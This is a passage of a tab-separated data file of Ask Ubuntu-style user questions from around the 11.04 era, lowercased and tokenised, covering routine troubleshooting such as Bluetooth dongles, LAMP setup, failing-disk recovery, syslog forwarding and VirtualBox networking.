dissapated however . because of the ability to log into shell , i removed tomcat6 , and am presently trying to get into crontab -e to remove some tasks . update3 okay , so i 've removed a secondary vhd , that way i only have the host drive on the system , i 've also run sudo apt-get remove tomcat6 . i 'm still seeing the blocking issue , and i 'm also now seeing * invalid catalina_base in /var/lib/tomcat6 on startup .
53745	compositing in lubuntu	is there any compositing built in lubuntu ? i do not mean installing compiz but rather something simple like metacity compositing to satisfy apps that require it .
53748	bash script : catching errors in a block of statements	i have a large iptables ruleset that i manage with my own bash script . most of the commands in the script are simple , single-statment iptables commands . i am trying to improve the script by adding success/failure output as the script executes . i have the script broken out into different sections . one example would be the forward chain section , where all the rules are applied to the forward chain . at the beginning of the section , i output that the script has started applying the forward rules , and at the end , i want to output whether or not all the rules were applied successfully , or if any of them did n't work . here is the basic idea : # start forward section echo -ne `` applying forward rules ... '' # rule 1 /sbin/iptables -a fowrard ... # rule 2 /sbin/iptables -a forward ... echo -ne `` \t\t\t [ ok ] \n '' what i 'm wanting to do is catch any output or errors that may result from each iptables command and store them in an array or something . then at the end of the block , use an if statement to evaluate the array to see if there were any errors . if not , output the [ ok ] status , if there were , output the [ failed ] status and display the related error . is there a way i can do this for the entire block of rules without wrapping each iptables rule in an if [ $ ? ! = 0 ] expression ?
53749	virtualbox is not updating to version 4.1 . why ?	i use virtualbox ( not the ose version ) which i installed ( following the instructions at www.virtualbox.org/wiki/linux_downloads ) using this repository : deb http : //download.virtualbox.org/virtualbox/debian natty contrib up until version 4.0.12 the software has updated automatically . version 4.1 has just been released and , although i can see it in synaptic , it does n't seem to be recognized as an update to the previous version by synaptic or by update manager . why is this , and is it safe to just install it alongside the previous version ?
53750	how do i insert special characters in open office ?	what is the shortcut to insert special characters in openoffice ? in ms word we type alt-0-1-8-8 to insert krutidev10 . this shortcut is very important for us to be able to work quickly .
53751	ubuntu one is not starting	i am using ubuntu in turkish and when click on ubuntu one , it does not start . however when using ubuntu in english it works . so i want ubuntu one to work in turkish ubuntu . what should i do ?
53752	is there a way to set unity 3d 's dock/launcher to be completely opaque like unity 2d 's ?	unity 3d icons and launcher : unity 2d icons and launcher : in unity 2d , the icons looks darker than in 3d . in 3d , the icons have a clearer color to them because of the transparency they 're given . i really like the 2d dark color . i have searched frantically and have found nothing about this . i have used confity , compiz ( with extra plugins ) , gconf-editor , and searched for compiz rules . nothing . edit : i understand that you can edit the top panel 's opacity with compiz settings manager , but i have n't found a way to do this for the dock/launcher alone .
53753	how do i configure a bluetile session in gdm ?	as you ubuntu folks know , canonical has switched away from the gnome desktop in favor of unity for natty . however , you can still access gnome through a `` classic '' option in the login screen . since i ca n't live without bluetile ( a tiling window manager ) i 've been sticking with the `` classic '' option but then launching bluetile every time i turn on my pc . ( before natty , there was a `` gnome + bluetile '' option available on login that made this unnecessary . ) my question is , what 's the right way to configure my box to once again have a working `` gnome + bluetile '' option available on login ? there is no documentation for this and it involves some pretty arcane linux/xwindows stuff i do n't fully understand . is the correct answer to create a new file with the name /usr/share/gnome-session/sessions/bluetile.session ? this is the best i 've been able to guess . how do i found out the correct info for this file ? is there an example of this anywhere on the interwebs ? i ca n't find any . thanks for any tips !
53760	does nginx use `` deferred '' as the default for the listen directive ?	many sites recommend using 'deferred ' with the listen directive for nginx . is this necessary on the ubuntu installation or is `` listen 80 '' sufficient with 'deferred ' on by default ? listen 80 default deferred ; # for linux
53762	how to use to use lm-sensors ?	i wanted to install a package to monitor the temperature of my cpu called lm-sensors . according to synaptic , it 's already installed . can someone give me some simple step-by-step instructions on how i can actually run it from the command line or otherwise ?
53766	how do i install secondlife ?	how the heck do i install the latest version of secondlife for natty ? i have it in archive manager and now i am stuck , i have tried tutorials and nothing helps . i am new to ubuntu and need much help . if someone could tell me commands to run that would help i have secondlife for linux version secondlife-i686-2.7.4.235167 i have it downloaded now what do i do ?
53770	how can i encode and decode percent-encoded strings on the command line ?	how can i encode and decode percent-encoded ( url encoded ) strings on the command line ? i 'm looking for a solution that can do this : $ percent-encode `` ændrük '' % c3 % a6ndr % c3 % bck $ percent-decode `` % c3 % a6ndr % c3 % bck '' ændrük
53775	weird looking screen after ubuntu server 11.04 boot	i got this after upgrading to 11.04 with some issues . it must be tty7 , since ctrl+alt+7 does nothing . i can change to tty [ 0-6 ] to make the screen look normal , and changing back makes the screen black . what is happening here ? it 's like it thinks i have x installed . thanks .
53778	non-full-screen application launcher in gnome 3 ?	i 'm trying out gnome shell in 11.04 . you can push the `` activities '' key to get into the overview where you can launch applications . i like the idea of the overview as an aid in switching focus , but it 's too slow for just launching an application . is gnome shell going to implement , or does it have , a way to launch applications ( besides the alt-f2 command launcher ) that is as quick as gnome-do ? edit : to be clear , i 'm aware of several gnome application launchers . i 'm curious about the gnome shell and any packages it includes ( not add-ons like gnome-do or synapse ) .
53781	application which will display the current coordinates of the mouse cursor ?	i 'd like to be able to display the current location of the pointer on the x display . is there any application which does this ?
53791	printing pdf-files via network extremely slow	i encounter grave problems trying to print pdf-files , no matter whether i use evince , okular or any other linux program . the documents are printed extremely slowly or even completely fail to print at all . i have tried printing from various ubuntu-installations on different network-printers ( canon and lexmark ) , with the same result . on the other hand the same files are printed swiftly through windows , which is a pity , since i do not want to use windows . are there any solutions ? thanks in advance !
53795	how do i make my usb bluetooth dongle work in ubuntu 11.04 ? ( ca n't init device hci0 : connection timed out ( 110 ) )	i 've a usb bluetooth dongle root @ maiko-cce-lin : ~ # lsusb | grep bluetooth bus 001 device 007 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) that is n't working properly , hardly-ever it works but stops working in my next reboot . what i 've tried it is n't software blocked root @ maiko-cce-lin : ~ # rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no my device is recognized by hciconfig root @ maiko-cce-lin : ~ # hciconfig -a hci0 : type : br/edr bus : usb bd address : 00:1f:81:00:01:1c acl mtu : 1021:4 sco mtu : 180:1 down rx bytes:330 acl:0 sco:0 events:8 errors:0 tx bytes:24 acl:0 sco:0 commands:30 errors:22 features : 0xff 0x3e 0x09 0x76 0x80 0x01 0x00 0x80 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : link mode : slave accept but i ca n't turn on my hci interface root @ maiko-cce-lin : ~ # hciconfig hci up ca n't init device hci0 : connection timed out ( 110 ) i do n't understand why.. the hcitool command does n't show any device . root @ maiko-cce-lin : ~ # hcitool dev devices : i 've tried to restart my bluetooth service too with this command and make all these previous commands again but without success . root @ maiko-cce-lin : ~ # service bluetooth restart * stopping bluetooth [ ok ] * starting bluetooth [ ok ] root @ maiko-cce-lin : ~ # the dongle works if you disconnect it from usb , wait a few seconds and connect it again . so there must be better solution for it ( a solution not involving physically removing the dongle ! )
53801	need to pick machine for ubuntu server	long story short : i need to setup a server in my home , i plan on it being mainly a web/mail/development server , php/apache/mysql/postfix , and of course some development tools ( xdebug ) , and i need it to be running 24/7 . i was planning on using ubuntu server edition and just secure shelling in after i had it setup , so i need a machine that 's cheap , lightweight hardware , and can be fine left running constantly . i was thinking something along the lines of a shuttle , or something like this : http : //www.newegg.com/product/product.aspx ? item=n82e16856176025 however , i 'm unsure how they are in the cooling department . i know the basic minimum requirements for ubuntu server are extremely low , but what do some people experienced with it have to say about minimum requirements , how much ram/how powerful of a cpu do you need for the server to be running smoothly ? -- also , is there any type of hardware specifications would be better for ubuntu server edition ( amd over intel ? ) . thanks for any/all advice !
53802	subwoofer sound preferences problem	i 'm having a problem with my ubuntu and my subwoofer . it wo n't work until i go into sound preferences - > output tab and re-select the device . two devices are displayed : 1 : internal audio analog surround 5.1 ( this is the one i have to use ) 2 : hda nvidia digital stera ( hdmi ) the problem is that this is n't something i have to do just once after boot . no , i have to do this everytime i want to listen to anything . ie : whenever rythmbox changes songs , the new song will not play through the subwoofer . i have to change the prefence on every single song . or , whenever i watch a video , or open youtube , or do anything . and it 's not really just the subwoofer . it 's bass in general . basically , i ca n't even listen to music anymore because i always always always always have to re-set the sound preference on every song . now , i never had a problem before until i added a bluetooth adapter ( dongle ? ) to my computer . after the drivers installed for that , my sound preferences wo n't work . why wo n't it just always work ? please help if you can . thanks .
53808	is there any log kept of the files i delete ?	i deleted a folder today while i was thinking i had clicked on another one . is there any log that i can search to find the name of the folder i just deleted ? the files deleted were probably not important ( it was a subfolder of a folder i keep movies ) so i do n't need to recover them - i just need the name of the folder . in case it matters , the folder used to be on a ntfs-formatted partition that has a bug on my system ( or is it in every ntfs out there ? i never searched cause i liked it better the way it is now ) to not send files to trash .
53809	where is application data stored ?	on windows , i often find the executable of an application associated with its data inside program files\appxxx\ . the equivalent executable can be found under /usr/bin , but where is its data located ? for example , i installed miktex but i could n't find its data . thank you .
53811	laptop seems to be overheating since installing ubuntu	i 'm completely new to ubuntu and it 's running great so far but the one issue that i 've been having is that my laptop seems to heat up more than usual ( even more than when i run windows ! ) . i only assigned about 1.8 gigs to my linux-swap partition ( and i 've heard that you should allocate double the amount of ram on your computer to this ) . could this be the culprit of my overheating laptop ? i ran the lm-sensors utility to check the temperature of my cpu and it 's been at about 67 degrees celsius and it says that the 100 degrees is critical . is that a pretty normal temperature or should i be worried ?
53812	how can i remove the default application indicators , like the power or the volume indicator , in unity ?	after installing a bunch of new application indicators , i realized that i was using a lot of the top-bar space , and wanted to get rid of some default indicators to have more space . is this somehow possible ?
53813	how to set terminal tab titles font size ?	i constantly get to a situation where my 1-2 character tab titles are cut , as i have over 20 tabs open . one way to solve my problem , would be to decrease the font size of the tab titles . any idea how can this be done ? thanks desgua , indeed i do decrease the system font to a certain degree ( application font=9 ) , but that 's help to a certain degree only . i guess the best solution would have been to find a way to get rid of the tabs ' close buttons , but have n't been able to find a way to do that .
53814	unable to detect monitor : `` failed to get size of gamma for output default ''	i 'm using hcl p30 laptop with 1280x800 60 hz default resolution . but none of the ubuntu versions are capable of detecting my monitor.in 11.04 the resolution is 1024x768 61 hz . when i run xrandr command in terminal , it returns xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 640x480 60.0 how can i set my monitor to 1280x800 60 hz ?
53821	how to sync a samsung galaxy pro with banshee ?	i have a samsung galaxy pro with android froyo which has 8gb worth of songs and i want to sync those with banshee on my home desktop which runs ubuntu natty 64 bit . there are videos on youtube which show htc syncing with banshee , but when i connect my samsung galaxy pro to my ubuntu desktop using a usb cable , it does not show up . any help ?
53822	how do you run ubuntu server with a gui ?	trying to run a ubuntu server for the first time.. but everything is in a terminal , is there a way to switch to a gui ? also , the server does n't have direct access to the internet.. so , is there a way to share it from a laptop ?
53835	how do i create a customized cd that does n't display any installation screens ?	i would like to create customized ubuntu installation cd . here is what i want a customized ubuntu installation cd to do : do not display any installation screens of ubuntu . manually , set default values of all installation screens ( such as keybord , timezone , login username and password , partitions etc ) in source code ( ubuntu installation code , may be in some configuration files ) install required packages and my project . how could i change ubuntu installation code and what changes need to apply ? i have read customize live ubuntu cd ? but there is no information for removing installation screens and their default settings.please , let me know , if i missed something . also , i would like to know , could it be possible to apply similar changes ( from that questions ) with ubuntu installation changes ? thanks : ) [ edit ] : problem when tried pressed and initrd method i have tried pressed file and initrd method as per the document . but now i 've stuck on a step . here , what i did : 1 ) used default preseed file ( given in document ) 2 ) used ubuntu 10.04 iso for testing 3 ) follow the link how to install ubuntu linux from usb stick to make usb bootable for installing ubuntu 10.04 . 4 ) now , i have bootable usb . but on installation , system could not found iso from the usb and it stops working . could anyone suggest , correct step by step method ( or links ) for the same ? thanks in advance : )
53838	top panel and launcher will only show if reset from terminal	firstly i had no top panel or side launcher after doing updates when i first installed ubuntu 11.04 on laptop as a dual boot with windows 7 . after days of asking questions on several other forums i discovered the suggestion that i should type in the terminal : `` unity -- reset '' after a heap of activity from the terminal window my top panel and side launcher reappeared but when i do a reboot i come back to no top panel and no side launcher . do i reset and back they come , do a reboot and away they are , just left with a desktop picture . something not saving the settings after the reset .
53841	local network in virtualbox 4 ?	i need to set up local network between ubuntu server 11.04 in virtualbox and my 11.04 desktop . best of all would be 127.0.0.1 for main , and 192.168.0.100 for virtulal machine . my ifconfig -a eth0 link encap : ethernet hwaddr 00:19:66:71:33:00 inet addr:192.168.0.243 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :219:66ff : fe71:3300/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3397254 errors:0 dropped:0 overruns:0 frame:0 tx packets:1973637 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4291602479 ( 4.2 gb ) tx bytes:141489577 ( 141.4 mb ) interrupt:40 base address:0xc000 lo link encap : локальная петля ( loopback ) inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:124 errors:0 dropped:0 overruns:0 frame:0 tx packets:124 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:19528 ( 19.5 kb ) tx bytes:19528 ( 19.5 kb ) vboxnet0 link encap : ethernet hwaddr 0a:00:27:00:00:00 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
53843	touch screen calibration in dual monitor setup	we are using a setup in which we have dual monitors where 1 is lvds disply and other is a touch screen.. the problem is after calibrating the touch screen when the pointer goes to second screen it gets stuck there and does n't come to touch screen . we have used ts_calibrate utility to calibrate the screen . i guess that this is the problem with the virtual resolution we set in our xorg.conf for dual disply . can any one suggest ho we should go ahead with the problem thanks
53844	software like total commander	is there any software in ubuntu which is similar than total commander , i tried krusader , but that is too weak , do n't have that many features that tc .
53846	how to get the md5 hash of a string directly in the terminal ?	how do i get the md5 hash of a string directly from the terminal ? for example , i want the string abcdefg hashed . currently the md5sum command only accepts a filename as input . i want to simply enter the following line and everything be done with . md5sum abcdefg output : ac54bcf346e578feb46888b3ecd2344f how can i achieve that ?
53850	can i configure unity search result behavior ?	i wanted to ask if it were possible to configure the unity search results in this way : installed programs are always shown expanded . programs `` ready for installation '' are removed and not included in the search . i am sure ĺemoving the search and display for not installed programs will speed up the search and save valuable screenspace ( i 'm on a dell mini here ) . why installed programs are n't shown in the first place is a mystery to me .
53851	how to convert .ogv to .avi ?	i 'm making tutorials with recordmydesktop . the thing is that the final file extension is .ogv but i want to convert it to .avi without losing quality . how to do that ?
53854	how to install ruby offline ?	i am trying to install ruby on a server which does not have connection to internet . i have copied ruby-1.9.2-p180.tar into ~/.rvm/archives . i tried to run rvm install ruby-1.9.2-p180 after that , but it still tries to download the file from the internet . how do i get this to install the tarfile which is inside the archives folder ? any instruction for offline installation would be very helpful .
53856	third mouse-button emulation	up until version 11.04 of ubuntu i could simply add an option to my x inputclass to emulate a third mouse button for my hp trackpoint like this : section `` inputclass '' identifier `` trackpoint '' matchispointer `` on '' option `` emulate3buttons '' `` true '' endsection i recently updated to the 11.10 to test the new features and i am satisfied so far but the before mentioned method stopped working . i suppose it 's related to the x-server update . i also tried adding a udev rule like this : env { x11_options.emulate3buttons } = '' true '' which is also ignored . is there anything i missed or something important that has changed ?
53857	how do i compile e-text-editor ?	i 've heard a lot of good things about e-text-editor . https : //github.com/ajpalkovic/e i 'm not an expert at compiling stuff so can anyone help me by showing me how compile it . or can anyone compile it and upload it some where
53859	dropbox style syncing of large folders ?	i 've researched this quite a bit in the past and have never found a solution that meets my needs perfectly , so i thought i 'd throw it out to this community . i have a file server at home that i use to store all my movies , music and photos on as well as backup documents and the like . currently i do this through samba shares , all working very nicely . however i would also like to have some folders sync live similar to how dropbox works . the main use case for this would be my files that i work on , code , video editing , etc . the key features i 'm looking for are : syncing between multiple computers ( does n't need to scale too high but 3 minimum ) . can handle large files ( gb sized ) can handle large directories ( 100gb+ ) nodes do n't need to be connected all the time ( laptop may be offsite ) bonus points for windows compatibility . once solution i 've looked at is http : //sparkleshare.org . it looks very promising but i 'm concerned as it 's backed by git that the repos would get very large in comparison to the files being stored . i think the best solution i 've seen so far is https : //github.com/philcryer/lipsync . in this solution however the server is dumb and the clients have to check for new updates via a cron job .
53870	desktop not loading after unsuccessfull password change	first of all - yes , i acted like a fool . i decided to change password in 11.04 , and process took so long , so i hit cancel and then even turned laptop off , because everything was dead . after that i turned it back on and got all those errors about .iceauthority update , and nautilus not able to create desktop and .nautilus folders . i changed my password back using passwd in console , even re-installed nautilus package ( fortunately , unity was gone ) , but still desktop is not loading , same error messages . sometimes i get pieces of desktop , like background image or top bar with menus , but it happens very seldom and they never come together . i also created new user and tried to log in using this new account , but received same error messages , but for this user . is there a way to recover my desktop ? of course i already got used to lynx , mplayer and fbi , but desktop would be a really nice thing to have : ) i also ca n't perform fresh install because despite the fact that i got ubuntu distro on my hard drive i cant burn it to a usb stick , because , well , i do n't know how .
53871	why is karmic ( 9.10 ) neither available from `` releases '' nor from `` old-releases '' ?	i need to upgrade an old install of jaunty ( 9.04 ) . following the guide from here , i wanted to download a cd image for karmic , but it 's neither available from http : //releases.ubuntu.com nor from http : //old-releases.ubuntu.com . all the other releases ( even the eol ones ) are listed here except for karmic , is there a reason for that ? ( it seems that it can still be downloaded via torrent . )
53872	how do i set up full disk encryption on an ssd ?	i have a new lenovo thinkpad with an intel ssd . i want to set up full disk encryption with pre-authentication boot . from reading i see there is a guided setup with encryption option on the alternate cd installer . if i select this and follow the prompts , will i be all set ? are there any specific partitions or anything i need to create ? are there any special things i need to do before , during , or after installation because i 'm installing on an ssd and not on an hdd ? the thinkpad came preinstalled with windows 7 . i will be installing natty narwhal on the whole disk . i will not be dual-booting .
53873	gnome session uses kde default cursor	i installed kde over my ubuntu 10.04 installation . now when i log into gnome i get the kde default cursor instead of the usual one . it 's a minor issue but one i 'd like to deal with especially since i 'll probably learn something in the process . : ) kde works fine though i 've decided i prefer gnome aesthetically .
53880	is there any way to check the battery percentage of apple wireless peripherals ?	i have an apple wireless keyboard and a magic trackpad , and i was wondering if there is a way to monitor the battery life remaining/percentage like there is in osx .
53881	tmpfs available space does not equal size	i have a quick question . i have a 64bit ubuntu 10.04 server with 24gb of ram and is used as a vmware workstation 7.1 host . i would like to use an in-memory drive for the vm memory location , which i setup as the following : tmpfs /mnt/vmware tmpfs defaults , size=100 % 0 0 that all works . next i want to allocate 16gb of ram to the vm , i know its a lot but we do a lot of processing that needs a lot of ram . after the vm is started and i run df -h , i get the following for that drive : filesystem size used avail use % mounted on tmpfs 24g 11g 14g 44 % /mnt/vmware why is it that the available ( 14gb ) size does not equal the size ( 24gb ) of the drive ? and why would n't the whole 16gb get allocated to the memory space , which is what i set in the vmware guest .vmx file ? is there a limit to the space that can be allocated to a tmpfs file system ? thanks for your time .
53886	what programs can display an rtfd ( rich text + attachments ) document ?	nothing on my ubuntu 11 system seems to automatically open rtfd files .
53888	black screen on login and then flickering of gui elements on nvidia 9500gs	last week i tried to install ubuntu 11.04 and i have a problem i can not solve . mit grafics card is an nvidia 9500gs which worked well with ubuntu , compiz and stuff before . the problem : i installed ubuntu 11.04 from the life cd besides an windows 7 home premium when i boot up ubuntu everything seems to be right the logon screen appears when i log in the screen is black in an interval of less then a second i can see the gui elements ( panels , desktop icons etc.. flickering ) . the only way i can shutdown the system now is doing it the hardware-way what i tryied so far ( 1 . attemp ) : i logged into the safe-mode which works well i tryied to install the nvidia properitary drivers through the gui this does not work saying `` ca n't find a valid source for the driver '' i activated the nvidia driver through the console with jockey which worked . in the gui there was the green dot then rebooting , trying to log in again same problem what i tryied so far ( 2 . attemp ) : so i rembered that in some versions of ubuntu in the past i had to install fresh nvidia drivers downloaded from their website . i downloaded the drivers from nvidia tryied to start them ( unfortunately the installation process requires to switch off x server ) which i tried by the way i knew ( sudo /etc/init.d/gdm stop ) . which tells me `` use sudo service gdm stop '' or something similar . i tried that without success . then i tried to switch to a console without gui by hitting `` strg+alt+f1 '' but this results in eternal black . i can then switch back to the gui through `` strg+alt+f7 '' . so the problem with my second attemp is , that i ca n't get a console without a gui and i ca n't install nvidia drivers with the gui ant i ca n't shutdown the gui while being in the gui ( spooky ) ... so do you have any ideas , what i did wrong or what i could try to get this fixed again ? maybe its not a graphics problem at all and you know better ?
53889	use old usb digital camera as webcam ?	i 've got an old average point-and-click digital camera that i do n't use anymore , but i wonder if i could reuse it as a webcam by plugging it as a usb device into an ubuntu computer ? where can i find out about this ? what shall i look for to know if the camera can act as a webcam ?
53890	sslhandshake error while porting ubuntuone-client without gnome and nautilus dependencies	following this question how to build ubuntuone-client so that it does n't depend on nautilus and gnome i am stuck . the ubuntu-sso login prompt does nothing after i enter email and password . going through log files i get sslhandshake error . so i wanted to know if there is anything ubuntu specific on those python source that i should patch to get it working ? or if i am doing something wrong ? i am trying to get it working on archlinux . here are the logs on sso and ubuntuone : 2011-07-20 21:50:42,543:543.970108032 - ubuntu_sso.main - error - exception while running dbus blocking code in a thread : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site-packages/ubuntu_sso/main/linux.py '' , line 56 , in _in_thread result_cb ( app_name , f ( ) ) file `` /usr/lib/python2.7/site-packages/ubuntu_sso/main/__init__.py '' , line 103 , in f credentials = self.processor.login ( email , password , token_name ) file `` /usr/lib/python2.7/site-packages/ubuntu_sso/account.py '' , line 165 , in login sso_service = self.sso_service_class ( basic , self.service_url ) file `` /usr/lib/python2.7/site-packages/lazr.restfulclient-0.12.0-py2.7.egg/lazr/restfulclient/resource.py '' , line 460 , in __init__ self._wadl = self._browser.get_wadl_application ( self._root_uri ) file `` /usr/lib/python2.7/site-packages/lazr.restfulclient-0.12.0-py2.7.egg/lazr/restfulclient/_browser.py '' , line 299 , in get_wadl_application response , content = self._request ( url , media_type=wadl_type ) file `` /usr/lib/python2.7/site-packages/lazr.restfulclient-0.12.0-py2.7.egg/lazr/restfulclient/_browser.py '' , line 242 , in _request str ( url ) , method=method , body=data , headers=headers ) file `` /usr/lib/python2.7/site-packages/lazr.restfulclient-0.12.0-py2.7.egg/lazr/restfulclient/_browser.py '' , line 211 , in _request_and_retry url , method=method , body=body , headers=headers ) file `` /usr/lib/python2.7/site-packages/httplib2-0.7.1-py2.7.egg/httplib2/__init__.py '' , line 1436 , in request ( response , content ) = self._request ( conn , authority , uri , request_uri , method , body , headers , redirections , cachekey ) file `` /usr/lib/python2.7/site-packages/lazr.restfulclient-0.12.0-py2.7.egg/lazr/restfulclient/_browser.py '' , line 130 , in _request redirections , cachekey ) file `` /usr/lib/python2.7/site-packages/httplib2-0.7.1-py2.7.egg/httplib2/__init__.py '' , line 1188 , in _request ( response , content ) = self._conn_request ( conn , request_uri , method , body , headers ) file `` /usr/lib/python2.7/site-packages/httplib2-0.7.1-py2.7.egg/httplib2/__init__.py '' , line 1123 , in _conn_request conn.connect ( ) file `` /usr/lib/python2.7/site-packages/httplib2-0.7.1-py2.7.egg/httplib2/__init__.py '' , line 911 , in connect raise sslhandshakeerror ( e ) sslhandshakeerror : [ errno 1 ] _ssl.c:503 : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed 2011-07-20 21:50:42,565:565.541982651 - ubuntu_sso.gui - info - on_login_error : args ( < ubuntu_sso.gtk.gui.ubuntussoclientgui object at 0x3063510 > , dbus.string ( u'ubuntu one ' ) , dbus.dictionary ( { dbus.string ( u'errtype ' ) : dbus.string ( u'sslhandshakeerror ' ) } , signature=dbus.signature ( 'ss ' ) ) ) , kwargs { } . 2011-07-20 21:52:08,917:917.640924454 - ubuntu_sso.credentials - warning - login/registration was denied to app dbus.string ( u'ubuntu one ' ) 2011-07-20 21:52:08,918:918.035984039 - ubuntu_sso.main - info - credentialsmanagement : emitting authorizationdenied with app_name `` ubuntu one '' . 2011-07-20 21:52:08,918:918.241977692 - ubuntu_sso.gui - info - calling custom close_callback < function < lambda > at 0x25b6938 > with params ( < gtk.window object at 0x3046640 ( gtkwindow at 0x30a4060 ) > , < gtk.gdk.event at 0x2e1df08 : gdk_delete > ) , { } 2011-07-20 21:52:18,923:923.69890213 - ubuntu_sso.main - info - shutting down , calling < built-in function main_quit > .
53891	irc clients with dcc support	i need an irc client with dcc support . what are my options ? additionally , is there a way to patch dcc support into empathy ? i would prefer patching as opposed to installing a seperate program .
53895	ubuntu 11.04 update error	i just updated my ubuntu 11.04 , but now when starting it a black screen is shown and prints : checking battery state stopping system v runlevel compatibility i tried to install the latest proprietary ati driver but the error remains
53896	natural sounding text to speech ?	i am looking for some easy to install text to speech software for ubuntu that sounds natural . i 've installed festival , gespeaker , etc. , but nothing sounds very natural . all very synthetic and hard to understand . any recommendations out there ?
53897	i can not get any files to sync or share under windows	i initially installed ubuntu one under linux , and it seems to work flawlessly . when i put files into my ubuntu one sync folder , the files are uploaded to the web interface . but for some reason , when i installed the windows version , nothing seems to work at all . i have double and triple checked everything , and i must be overlooking something . i re-installed the .net framework , yet nothing i put in /my documents/ubuntu one ever uploads to the website , nor does it sync with my linux system at home . please help ! i have no idea what is wrong . it should be a simple process as putting files in the sync folder , clicking `` sync '' folder , and whatever is in that folder should upload to the web interface . what am i doing wrong ? what am i overlooking ? please help . i would really love to switch over from dropbox to this service , because the price is definitely right , but i can not make that move if i can not get it work . if i , a slightly competent computer guy can not get it to work , how am i going to convince the cavemen i work for to switch ? i mean , asking to install .net framework outside of the actual installer program is a lot to ask as is ... so hopefully someone can help me , thanks !
53899	localhost .htaccess not working ?	now i install wordpress then buddypress , after the install buddypress i run the site , home page was run , when click the other page link the page was not working . show this error not found the requested url /repo/website/groups/ was not found on this server . apache/2.2.17 ( ubuntu ) server at localhost port 80 after then i check my local htaccess , here is all are ok , but why the problem is showing . here is my local htaccess .. < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory >
53900	having problems getting lamp installed	okay , this is like my fifth time trying to get lamp set up on ubuntu , and yes , that includes using xampp . ( all i want to do is practice my php so i can write wordpress plugins ! sob why does the world 's easiest language have to be so hard to set up ? ) cough anyway . i used these instructions this time , after uninstalling xampp and what were hopefully all traces of my last attempt at doing this . i 'm not using netbeans -- gedit is okay with me -- and i did n't get any error messages or anything , so i thought i 'd actually gotten it set up and set to use /home/feathertail/php as the document root . i put a test file in there , browsed to /localhost and got this : forbidden you do n't have permission to access /testphp.php on this server . apache/2.2.17 ( ubuntu ) server at localhost port 80 can anyone point me in the direction of finally solving this once and for all ?
53902	how can i recover data from a 2tb hard drive ?	i have a western digital 2tb external hard drive . i basically use it to keep all my movies and videos . its file system is ntfs , and currently i 'm using 1.4tb . one night i turn it on and copied a 4gb file and there was no problem . then i tried to copy another 6gb file and ubuntu throw the following error : `` input/output error '' . i tried to create a new folder with no luck . i still could read the disk an play a file , so i thought restarting the computer would solve the problem , but it did n't . the next time , ubuntu did n't mount the disk . after that i tried in another pc with window 7 . it throwed a message telling me : first , that the disk needs to be formatted , and second , a `` local disk # : is not accessible . data error ( cyclic redundancy check ) '' . here is when i started to worry . i tried to fix the disk with chkdsk ( chkdsk \r ) . after about 5 hours , it crashed with the following error : `` an unspecified error occurred '' . my guess to all this is that the disk is dying . : ' ( lastly i did one more thing . i installed gsmartcontrol on ubuntu to see the smart info and the attributes tab appears in red with the following line highlited : id # attribute_name flag value worst thresh type updated when_failed raw_value ... 197 current_pending_sector 0x0032 197 197 000 old_age always - 977 ... just to check , i left the disk on for about 2 minutes and then refreshed the page , and the current_pending_sector raw_value increased from 977 to 979 . my guess is that sectors on the disk are dying . am i right ? if every time i turn on the disk more sectors are going to die , i need to copy the data fast . i do n't know if there is a solution on windows , and i 'm worried about the time that it could take to do it with the slowness of windows . basically my question is : how can i recover the data ? ( or at least some of it ) . is there any program on ubuntu that can help me with this ( if i 'm still on time ) ? . my main concern is the size of the disk ( 2tb ) , so i think i would need at least another 2tb disk to copy to . any help would be appreciated .
53907	voice is echoing on headphone	i am using ubuntu 11.04 and whenever i am using headphone for music but the voice is echoing . but with simple system speaker it is good .do n't know why it is showing error like this.please help me to solve this.any help will be appreciable
53910	how can i receive syslog logs from a networked system ?	i 'd like to configure ubuntu to receive logs from a dd-wrt router . the router 's configuration screen contains the following section : and its logging documentation reads : if you wish to send logs to a remote system , enter the ip address of that machine which is also running a syslog utility ( it needs an open network socket in order to accept logs being sent by the router ) . i 've never ( knowingly ) used syslog before . what do i need to do in ubuntu to allow it to receive these logs ?
53916	what happens if déjà dup tries to back up to a disconnected external disc ?	i have just installed déjà dup on my ( 11.04 ) laptop and have scheduled automatic weekly backups to an external hard disc which is not always connected to the laptop . what will happen if a scheduled backup is attempted when the external disc is not connected ?
53926	ubuntu one wont connect with an authentication failure	i have set up account . can sign in from browser , have registered android phone . can not connect from natty . message when i try to sign in : an exception representing an authentication failure . i have reset password to no avail . thoughts ?
53927	how can i create something similar to an alias , that does properly expand to the initial command ?	i have set up aliases for apt-get update , apt-get install , and so on . thats quite convenient . but what i really would like to have is something like this : type agi tab vi and have it automatically list all packages starting with vi , as it would happen when issuing apt-get install tab vi . would something like this be achievable somehow , maybe by writing a little script ?
